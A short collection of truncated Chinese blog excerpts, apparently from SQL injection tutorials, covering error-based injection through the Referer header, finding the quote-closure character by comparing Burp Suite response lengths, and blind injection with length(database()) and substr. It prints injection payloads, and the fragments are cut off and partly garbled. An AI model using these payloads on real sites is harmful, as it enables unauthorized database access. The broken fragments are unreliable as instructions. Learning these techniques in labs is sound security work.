Referer:" and (select 1 from (select count(),concat((database()),floor(rand(0)2))x from informati...

双引号封装的能把里面的所有东西当作字符串来处理，除了双引号例如：id="1--+and 1=2"其实他还是查询了id=1并没有执行后面的那些所以双引号过滤还是有些麻烦，但是用双引号尝试闭合会发现...

发现无论输什么回显都一样故此，用burpsuite看回显的长度1' 7441 为7071' and '1'='1 为7071' and '1'='2 为744,可以判断是单引号闭合1" and ...

通过length(user())判断是mysql数据库名长度 id=1' and length(database())>=8--+爆数据库名id=1' and substr(databas...